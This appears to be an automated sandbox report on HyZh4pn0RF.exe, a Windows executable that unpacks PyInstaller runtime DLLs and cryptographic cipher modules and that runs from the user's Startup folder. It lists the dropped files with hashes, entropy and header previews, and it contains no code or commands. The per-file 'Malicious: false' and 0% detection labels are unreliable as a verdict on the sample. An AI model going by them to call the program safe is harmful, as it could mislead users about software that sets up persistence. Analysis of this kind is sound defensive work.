Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	787224
Entropy (8bit):	5.609561366841894
Encrypted:	false
SSDEEP:	12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
MD5:	19A2ABA25456181D5FB572D88AC0E73E
SHA1:	656CA8CDFC9C3A6379536E2027E93408851483DB
SHA-256:	2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
SHA-512:	DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%...........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D)......................... ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	199448
Entropy (8bit):	6.385263095268062
Encrypted:	false
SSDEEP:	3072:gP9/HQAYp/8IdzL37lqrEJesY7p7Ndrjt8HWcFwUT6ZIALhNn6:opFYp/vdzL3pqrEJ2xDrJ8DdT6A
MD5:	F179C9BDD86A2A218A5BF9F0F1CF6CD9
SHA1:	4544FB23D56CC76338E7F71F12F58C5FE89D0D76
SHA-256:	C42874E2CF034FB5034F0BE35F7592B8A96E8903218DA42E6650C504A85B37CC
SHA-512:	3464ECE5C6A0E95EF6136897B70A96C69E552D28BFEDD266F13EEC840E36EC2286A1FB8973B212317DE6FE3E93D7D7CC782EB6FC3D6A2A8F006B34F6443498DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d......e.........." ...%.............................................................)....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dll

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7009048
Entropy (8bit):	5.7826778751744685
Encrypted:	false
SSDEEP:	49152:mz0oCxOqKWneF3o1VLCClOTNRpaOviXEYWyb3eOYTvuFsx/iac84YNFXiTlv5WF4:mooCcqKLHX+az2Ro8Kv7HDMiEB/
MD5:	550288A078DFFC3430C08DA888E70810
SHA1:	01B1D31F37FB3FD81D893CC5E4A258E976F5884F
SHA-256:	789A42AC160CEF98F8925CB347473EEEB4E70F5513242E7FABA5139BA06EDF2D
SHA-512:	7244432FC3716F7EF27630D4E8FBC8180A2542AA97A01D44DCA260AB43966DD8AC98B6023400B0478A4809AACE1A128F1F4D6E544F2E591A5B436FD4C8A9D723
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..e...e...e...d...e.......e...`...e...a...e...f...e.......e..d...e...d...e..Bh.M.e..Be...e..B....e..Bg...e.Rich..e.........................PE..d......e.........." ...%.$)..ZB......]........................................k.....:.k...`...........................................O.d...toP......Pj.......`.dZ....j../...`j.pZ....3.T.....................I.(...P.3.@............@)..............................text....")......$)................. ..`.rdata...T'..@)..V'..().............@..@.data....?....P......~P.............@....pdata..dZ....`..\....`.............@..@PyRuntim.....@c......\b.............@....rsrc........Pj......^i.............@..@.reloc..pZ...`j..\...hi.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dll

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	134656
Entropy (8bit):	5.9953900911096785
Encrypted:	false
SSDEEP:	3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
MD5:	26D752C8896B324FFD12827A5E4B2808
SHA1:	447979FA03F78CB7210A4E4BA365085AB2F42C22
SHA-256:	BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
SHA-512:	99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30488
Entropy (8bit):	6.582548725691534
Encrypted:	false
SSDEEP:	384:b9yLTFInPLnIdHqp3DT90IZIAQGyHQIYiSy1pCQ273bAM+o/8E9VF0Nypyn4:6inzUHqN1rZIAQGo5YiSyvUrAMxkEjh
MD5:	8A273F518973801F3C63D92AD726EC03
SHA1:	069FC26B9BD0F6EA3F9B3821AD7C812FD94B021F
SHA-256:	AF358285A7450DE6E2E5E7FF074F964D6A257FB41D9EB750146E03C7DDA503CA
SHA-512:	7FEDAE0573ECB3946EDE7D0B809A98ACAD3D4C95D6C531A40E51A31BDB035BADC9F416D8AAA26463784FF2C5E7A0CC2C793D62B5FDB2B8E9FAD357F93D3A65F8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d......e.........." ...%.....2.......................................................y....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1500440
Entropy (8bit):	6.588676275246953
Encrypted:	false
SSDEEP:	24576:iTqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFv++b:hk0jwv4tP5kf8ar/74EF2/An4acrVUcc
MD5:	C1161C1CEC57C5FFF89D10B62A8E2C3A
SHA1:	C4F5DEA84A295EC3FF10307A0EA3BA8D150BE235
SHA-256:	D1FD3040ACDDF6551540C2BE6FF2E3738F7BD4DFD73F0E90A9400FF784DD15E6
SHA-512:	D545A6DC30F1D343EDF193972833C4C69498DC4EA67278C996426E092834CB6D814CE98E1636C485F9B1C47AD5C68D6F432E304CD93CEED0E1E14FEAF39B104A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d......e.........." ...%............................................................M7....`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1137944
Entropy (8bit):	5.462202215180296
Encrypted:	false
SSDEEP:	12288:hrEHdcM6hbFCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciFt:hrEXYCjfk7bPNfv42BN6yzUiFt
MD5:	04F35D7EEC1F6B72BAB9DAF330FD0D6B
SHA1:	ECF0C25BA7ADF7624109E2720F2B5930CD2DBA65
SHA-256:	BE942308D99CC954931FE6F48ED8CC7A57891CCBE99AAE728121BCDA1FD929AB
SHA-512:	3DA405E4C1371F4B265E744229DCC149491A112A2B7EA8E518D5945F8C259CAD15583F25592B35EC8A344E43007AE00DA9673822635EE734D32664F65C9C8D9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d......e.........." ...%.>..........`*.......................................p............`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133632
Entropy (8bit):	5.851293297484796
Encrypted:	false
SSDEEP:	3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
MD5:	3A80FEA23A007B42CEF8E375FC73AD40
SHA1:	04319F7552EA968E2421C3936C3A9EE6F9CF30B2
SHA-256:	B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
SHA-512:	A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.703513333396807
Encrypted:	false
SSDEEP:	96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
MD5:	6176101B7C377A32C01AE3EDB7FD4DE6
SHA1:	5F1CB443F9D677F313BEC07C5241AEAB57502F5E
SHA-256:	EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
SHA-512:	3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...b..b..b..R...b..Uc..b.Rc..b..c..b..Ug..b..Uf..b..Ua..b..j..b..b..b....b..`..b.Rich.b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.968452734961967
Encrypted:	false
SSDEEP:	96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
MD5:	371776A7E26BAEB3F75C93A8364C9AE0
SHA1:	BF60B2177171BA1C6B4351E6178529D4B082BDA9
SHA-256:	15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
SHA-512:	C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_chacha20.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.061461040216793
Encrypted:	false
SSDEEP:	192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
MD5:	CB5238E2D4149636377F9A1E2AF6DC57
SHA1:	038253BABC9E652BA4A20116886209E2BCCF35AC
SHA-256:	A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
SHA-512:	B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_pkcs1_decode.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.236167046748013
Encrypted:	false
SSDEEP:	192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
MD5:	D9E7218460AEE693BEA07DA7C2B40177
SHA1:	9264D749748D8C98D35B27BEFE6247DA23FF103D
SHA-256:	38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
SHA-512:	DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...........R......U.....R............U......U......U................}.........Rich...........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..\|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.558176937399355
Encrypted:	false
SSDEEP:	384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
MD5:	F751792DF10CDEED391D361E82DAF596
SHA1:	3440738AF3C88A4255506B55A673398838B4CEAC
SHA-256:	9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
SHA-512:	6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...b..b..b..R...b..Uc..b.Rc..b..c..b..Ug..b..Uf..b..Ua..b..j..b..b..b....b..`..b.Rich.b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aesni.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.285191078037458
Encrypted:	false
SSDEEP:	192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
MD5:	BBEA5FFAE18BF0B5679D5C5BCD762D5A
SHA1:	D7C2721795113370377A1C60E5CEF393473F0CC5
SHA-256:	1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
SHA-512:	0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_arc2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.505471888568532
Encrypted:	false
SSDEEP:	192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
MD5:	D2175300E065347D13211F5BF7581602
SHA1:	3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
SHA-256:	94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
SHA-512:	6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_blowfish.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	6.06124024160806
Encrypted:	false
SSDEEP:	384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
MD5:	45616B10ABE82D5BB18B9C3AB446E113
SHA1:	91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
SHA-256:	F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
SHA-512:	ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cast.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25088
Entropy (8bit):	6.475467273446457
Encrypted:	false
SSDEEP:	384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
MD5:	CF3C2F35C37AA066FA06113839C8A857
SHA1:	39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
SHA-256:	1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
SHA-512:	1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cbc.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.838534302892255
Encrypted:	false
SSDEEP:	192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
MD5:	20708935FDD89B3EDDEEA27D4D0EA52A
SHA1:	85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
SHA-256:	11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
SHA-512:	F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cfb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	4.9047185025862925
Encrypted:	false
SSDEEP:	192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
MD5:	43BBE5D04460BD5847000804234321A6
SHA1:	3CAE8C4982BBD73AF26EB8C6413671425828DBB7
SHA-256:	FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
SHA-512:	DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K............RQ.....U.....R............U......U......U..................=..........Rich...................PE..d....e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ctr.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.300163691206422
Encrypted:	false
SSDEEP:	192:j0J1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDrdkrRcqgUF6+6vEX:jM01si8XSi3SACqe7tDeDgUUjvE
MD5:	C6B20332B4814799E643BADFFD8DF2CD
SHA1:	E7DA1C1F09F6EC9A84AF0AB0616AFEA55A58E984
SHA-256:	61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
SHA-512:	D50C7F67D2DFB268AD4CF18E16159604B6E8A50EA4F0C9137E26619FD7835FAAD323B5F6A2B8E3EC1C023E0678BCBE5D0F867CD711C5CD405BD207212228B2B4
Malicious:	false
